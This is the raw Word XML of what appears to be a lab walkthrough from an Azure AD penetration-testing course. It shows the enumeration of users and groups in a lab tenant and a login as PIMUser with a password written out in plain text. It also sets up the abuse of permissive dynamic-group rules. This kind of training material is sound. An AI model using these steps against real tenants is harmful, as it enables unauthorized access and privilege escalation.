          <w:p w14:paraId="4AAC7AB2"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ed08f738de43 retailcorp.onmicrosoft.com User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="348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55EBCA44"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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="487A7835" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="45"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="237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FD52FEF" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="4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32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509CB798" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="4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348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273C1EE8" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="4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bl>
    <w:p w14:paraId="1D625F80" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="555" w:after="0" w:line="270" w:lineRule="atLeast"/>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Use the following commands from the Azure AD module to enumerate the tenant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F66799" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="240" w:after="0" w:line="270" w:lineRule="atLeast"/>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Enumerate Users:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9090"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="74FCE155" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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4F137F7"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PS C:\AzAD\Tools&gt; Get-AzureADUser -All $true</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="315AC6CA" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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245D7B95"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[snip]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02890E0D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EECB3F4" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="60" w:after="0" w:line="270" w:lineRule="atLeast"/>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Enumerate Groups:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9090"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="2B718EF3" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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9C0906E"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PS C:\AzAD\Tools&gt; Get-AzureADGroup -All $true</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="2C86EB2E" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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E85C297"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[snip]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EF912C2" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="570" w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>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lastRenderedPageBreak/>
        <w:t>Let's check if we can access any azure resource as the current user. This will also help in checking if the 'PIMAdmin' group has any permissions on Azure resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44518E84" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="270" w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>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Run the following command in a new PowerShell session to connect to the retailcorp tenant as PIMUser using Az PowerShell module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D54954" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C6ADA28" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        </w:rPr>
        <w:t>PS C:\AzAD\Tools&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$password = ConvertTo-SecureString 'ZuqK&amp;ijv0085VnCI&amp;#' -AsPlainText -Force</w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>PS C:\AzAD\Tools&gt; $creds = New-Object System.Management.Automation.PSCredential('PIMUser@retailcorp.onmicrosoft.com', $password)</w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>PS C:\AzAD\Tools&gt; Connect-AzAccount -Credential $creds</w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4170"/>
        <w:gridCol w:w="4920"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="44BE64C6" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="417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A4004AD"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Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492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5003A04"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SubscriptionName TenantId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="4F797610" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="417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572CD80B"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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492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E690F36"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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="66110D51" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="417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1B32FF0" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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c>
          <w:tcPr>
            <w:tcW w:w="492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5242C1C9" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>---------------- --------</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="485FCE37" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="417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738D057" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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c>
          <w:tcPr>
            <w:tcW w:w="492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99D735F"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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="33F19566" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="417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E76F17E"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PIMUser@retailcorp.onmicrosoft.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492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541B3C9F"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711c59fe-8dee-40c0-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="3A6B26D6" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="417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55FD4AA3"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adc1-ed08f738de43 AzureCloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492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1252E39"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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="238FEB7B" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="60"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="417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BBDA966" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60"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492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61876BB" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60"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bl>
    <w:p w14:paraId="634997C9" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="555" w:after="0" w:line="270" w:lineRule="atLeast"/>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List the Azure resources where PIMUser has at least read access:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13500" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13500"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="508E260B" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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950EC83"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PS C:\AzAD\Tools&gt; Get-AzResource</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>Get-AzResource : 'this.Client.SubscriptionId' cannot be null. At line:1 char:1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="785666A2" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="150"/>
        <w:gridCol w:w="3240"/>
        <w:gridCol w:w="5700"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="4E17D570" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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25AC519C" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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c>
          <w:tcPr>
            <w:tcW w:w="32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5EC391C8"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Get-AzResource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="57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FBC83C5"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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="6296273F" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="225"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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363FE5C" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225" w:lineRule="atLeast"/>
              <w:jc w:val="righ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c>
          <w:tcPr>
            <w:tcW w:w="32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2E21CCA4" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225" w:lineRule="atLeast"/>
              <w:jc w:val="righ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c>
          <w:tcPr>
            <w:tcW w:w="57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1B4726A" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="22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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="258184CA" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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56C7474"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32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CBC5471"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 CategoryInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="57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00045C7"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 CloseError: (:) [Get-AzResource],</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="21BEBBBA" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="60"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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4CFF446" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60"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32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8DB2693" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60"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57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A63CD10" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60"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bl>
    <w:p w14:paraId="2D348B0A" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9354"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="0976BE2C" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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53C6C883"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ValidationException</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C07272E" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="30" w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>+FullyQualifiedErrorId : </w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
              </w:rPr>
              <w:t>Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureRes</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> ourceCmdlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B6A42C7" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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br/>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="269086E4" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>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The error that we got means that the user PIMUser has no access to any of the Azure resources. So, as PIMUser we are limited to Azure AD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11938DF5" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="285" w:after="0" w:line="240" w:lineRule="auto"/>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We may like to enumerate if there are Dynamic Groups. As discussed in the course, dynamic groups allow membership based on rules and it may be possible to abuse an overly permissive rule!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B99B29" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="300" w:after="0" w:line="270" w:lineRule="atLeast"/>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lastRenderedPageBreak/>
        <w:t>Let's use the Azure AD Preview module to list dynamic groups. We are using the Azure AD Preview module as the Azure AD module is unable to list the membership rule!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8265B6" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="285" w:after="0" w:line="270" w:lineRule="atLeast"/>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Use the below command to list Dynamic Groups. Note that we are first removing the Azure AD module from current PowerShell session and then importing the Azure AD Preview module. Double check the version of the AzureADPreview module for the correct path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0884CD97" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13500" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
